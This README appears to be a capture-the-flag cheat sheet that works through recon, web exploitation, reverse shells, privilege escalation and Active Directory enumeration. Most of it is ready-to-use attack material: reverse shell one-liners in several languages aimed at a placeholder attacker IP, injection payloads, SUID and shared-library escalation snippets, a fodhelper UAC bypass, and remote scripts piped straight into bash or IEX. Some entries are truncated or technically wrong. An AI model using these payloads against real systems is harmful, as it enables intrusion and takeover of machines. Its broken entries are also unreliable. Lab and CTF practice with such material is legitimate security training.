Files
CTF_CheatSheet/README.md
T
2026-07-30 20:32:10 +01:00

12 KiB
Raw Blame History

CTF_CheatSheet

Stage 1 Lay of the Land (Enumeration)

Active Reconnaissance

Tool Purpose Key Command
Nmap Port scanning & service detection nmap -sV -sC -oA nmap/basic [IP]
Masscan Ultra-fast port scanning masscan [IP] -p 1-65535 --rate 10000 -oX masscan.xml
Netdiscover ARP discovery on local network netdiscover -i [INTERFACE]
RPC Client Enumerate RPC services & null sessions rpcclient -U "" [IP]
Enum4Linux SMB/LDAP/RPC enumeration enum4linux [IP]

Passive Reconnaissance

Tool Purpose
Shodan Internet-wide device search
Wayback Machine Historical website snapshots
The Harvester Email and subdomain enumeration
DNS Recon DNS enumeration and zone transfers

Directory & File Enumeration

Tool Command
Gobuster (HTTP) gobuster dir -u http://[URL] -w [wordlist] -t 10 -r
Gobuster (DNS) gobuster dns -d [domain] -w [wordlist]
Dirb dirb http://[URL] /path/to/wordlist
FFuF ffuf -u http://[URL]/FUZZ -w [wordlist] -mc 200,204,301,302,307,401,403

Nmap Deep Dive

# Basic comprehensive scan
nmap -sV -sC -oA nmap/basic [IP]

# All ports with version detection
nmap -p- -sV -oA nmap/full [IP]

# Aggressive scan with OS detection
nmap -A -T4 [IP]

# UDP scan
nmap -sU -p 53,161,162,445,500 [IP]

# Stealth scan (SYN)
nmap -sS -p- [IP]

# Script scan (NSE)
nmap --script vuln [IP]

# Service version enumeration
nmap -sV --script smb-enum-shares -p 445 [IP]

Nmap Command Reference

HOST DISCOVERY:

  • -sL List Scan
  • -sn Ping Scan (no port scan)
  • -Pn Skip host discovery, treat all as online

SCAN TECHNIQUES:

  • -sS TCP SYN (stealthy)
  • -sT TCP Connect
  • -sU UDP Scan
  • -sA ACK Scan
  • -sN/-sF/-sX NULL/FIN/Xmas Scans

PORT SPECIFICATION:

  • -p 22,80,443 Specific ports
  • -p 1-65535 All ports
  • -p U:53,T:80 Mixed UDP/TCP

OUTPUT:

  • -oN Normal
  • -oX XML
  • -oG Grepable
  • -oA All formats

Masscan Reference

# Fast scan all ports
masscan [IP/CIDR] -p 1-65535 --rate 10000 -oX output.xml

# Grab banners
masscan [IP/CIDR] -p 80,443,8080 --banners -oX output.xml

# Read and convert binary results
masscan --open --banners --readscan input.bin -oX output.xml

Stage 2 Initial Access (Foothold)

Web Exploitation

Common Web Vulns to Exploit

Vulnerability Description Exploitation
SQL Injection Database query manipulation ' OR '1'='1'; --
XSS JavaScript injection in DOM <img src=x onerror="alert('XSS')">
CSRF Cross-Site Request Forgery Forge requests with valid session tokens
Path Traversal Access files outside intended dir ../../../etc/passwd
XXE XML External Entity injection <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
SSRF Server-Side Request Forgery http://localhost:8080/admin
Command Injection OS command execution ; cat /etc/passwd
LFI/RFI Local/Remote File Inclusion ?file=../../../../etc/passwd

SQLMap

# Basic SQL injection test
sqlmap -u "http://[URL]?id=1" --dbs

# Dump all databases
sqlmap -u "http://[URL]?id=1" --dump-all

# OS shell
sqlmap -u "http://[URL]?id=1" --os-shell

# POST request
sqlmap -u "http://[URL]" --data="user=admin&pass=test" -p user --dbs

Burp Suite Workflow

  1. Capture traffic in Proxy
  2. Send to Repeater for manual testing
  3. Send to Intruder for fuzzing/brute force
  4. Scanner for automated vulnerability detection
  5. Decoder for encoding/decoding payloads

Web Shell Uploads

# Test file upload with shell
# Common shell names: shell.php, index.php, upload.php

# Check upload bypass techniques:
# - shell.php.jpg
# - shell.jpg.php
# - shell.php%00.jpg
# - shell.phtml
# - shell.shtml
# - shell.phar

Reverse Shells & Initial Access

Listener Setup

# Netcat listener
nc -lvnp [PORT]

# Multi-handler (Metasploit)
msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST [YOUR_IP]
> set LPORT [PORT]
> run

Reverse Shell Payloads

Language Command
Bash bash -i >& /dev/tcp/[IP]/[PORT] 0>&1
Python python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[IP]",[PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
PHP php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'
Node.js require('child_process').exec("bash -c 'bash -i >& /dev/tcp/[IP]/[PORT] 0>&1'");
PowerShell `powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IP]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1
Java See payload generators at http://www.jackson-t.ca/runtime-exec-payloads.html

PentestMonkey PHP Reverse Shell

php-reverse-shell - A Reverse Shell implementation in PHP PentestMonkey PHP Reverse Shell: A Reverse Shell implementation in PHP - Check https://github.com/pentestmonkey/php-reverse-shell

Upgrade Shell to TTY (Linux)

# Check if TTY
tty

# Upgrade with Python
python3 -c "import pty;pty.spawn('/bin/bash')"

# Full interactive terminal
stty raw -echo; fg
export TERM=xterm

Windows Reverse Shell (PowerShell)

# Powershell reverse shell
$client = New-Object System.Net.Sockets.TCPClient("[IP]",[PORT])
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + "PS " + (pwd).Path + "> "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()

# One-liner
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('[IP]',[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Stage 3 Privilege Escalation

Linux Privilege Escalation

Quick Enumeration

# Check current user and groups
id
whoami
groups

# Kernel version
uname -a
cat /etc/os-release

# Check SUID binaries
find / -user root -perm -4000 2>/dev/null

# Check for writable directories
find / -type d -writable 2>/dev/null

# Check sudo permissions
sudo -l

# Check cron jobs
crontab -l
cat /etc/cron* -l

# Check installed applications
apt list --installed
pip list
npm list -g

SUID Exploitation

Find SUID binaries:

find / -user root -perm -4000 2>/dev/null

Exploit with GTFOBins: Check https://gtfobins.github.io/ for SUID/sudo escapes

Common SUID Exploits:

# systemctl privilege escalation
cd /tmp
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cp /bin/bash /tmp/bash;chmod +s /tmp/bash"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
/tmp/bash -p

# Find library injection opportunities
ldd /path/to/suid/binary

# Shared library hijacking
mkdir -p /tmp/lib
echo 'int __libc_start_main() { system("bash"); return 0; }' > /tmp/lib/evil.c
gcc -shared -fPIC /tmp/lib/evil.c -o /tmp/lib/evil.so
LD_LIBRARY_PATH=/tmp/lib:/usr/lib /path/to/suid/binary

Capability Escalation

# Check for capabilities
getcap -r / 2>/dev/null

# Exploit (example: cap_setuid)
# Look up on GTFOBins for specific binary

Sudo Exploitation

# Check sudo permissions
sudo -l

# If ALL=(ALL) NOPASSWD: /usr/bin/python3
sudo /usr/bin/python3 -c "import os;os.system('/bin/bash')"

# Exploiting wildcards in sudo commands
# If: sudo /usr/bin/script.sh /tmp/*
# Create: /tmp/evil.sh

Kernel Exploitation

# Find kernel exploits
# Use: searchsploit, Exploit-DB

# Common kernels:
# 4.4.0-21  CVE-2016-5195 (Dirty COW)
# 5.4.0  overlayfs exploit
gcc -o exploit exploit.c
./exploit

PEASS Enumeration

# Download and run linPEAS
curl https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash

# Or:
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Windows Privilege Escalation

Quick Enumeration

# Current user and groups
whoami
whoami /groups
net user %USERNAME%

# System info
systeminfo
Get-ComputerInfo

# Check privileges
whoami /priv

# List installed applications
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select DisplayName

Windows Privilege Escalation Vectors

Vector Check Exploitation
Unquoted Service Paths wmic service list brief Place exe in path before target
Weak Service Permissions accesschk.exe -ucqv [SERVICE] Modify service binary or path
AlwaysInstallElevated Registry check msiexec /i shell.msi /qn
Scheduled Tasks schtasks /query /v Replace task binary
Weak Registry Permissions Check ACLs on HKLM Modify to point to malicious binary
Kernel Exploits systeminfo for OS version Search Exploit-DB
UAC Bypass Check UAC status Use bypassuac tools or exploits

WinPEAS

# Download and run WinPEAS
IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')

# Or direct binary
.\winPEASx64.exe

Common Windows Exploits

# Unquoted service path exploitation
# Service: C:\Program Files\App\Service.exe
# Create: C:\Program.exe or C:\Program Files\App.exe

# AlwaysInstallElevated exploitation
msiexec /i malicious.msi /qn /norestart

# Scheduled task exploitation (if you can write to task location)
schtasks /create /tn evil /tr "C:\path\to\malicious.exe" /sc minute /mo 1

# UAC bypass - fodhelper.exe
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd.exe /c C:\path\to\payload.exe" -Force
fodhelper.exe

Stage 4 Active Directory (AD)

AD Enumeration

Basic Tools & Commands

# Get domain info
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# List domain users
Get-ADUser -Filter * | Select Name, SamAccountName

# List domain groups
Get-ADGroup -Filter * | Select Name

# List group members
Get-ADGroupMember "Domain Admins"

# Check current user's groups
whoami /groups

# Find trusts
Get-ADTrust -Filter *

PowerView (AD Recon Toolkit)

# Download PowerView
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')

# Get domain info
Get-NetDomain
Get-NetForest

# Enumerate users
Get-NetUser | Select name, lastlogon, pwdlastset
Get-NetUser -UACFilter DONT_EXPIRE_PASSWORD

# Find interesting shares
Invoke-ShareFinder

# Get group membership
Get-NetGroup "Domain Admins" | Get-NetGroupMember

# Find admin users
Get-NetUser -Admin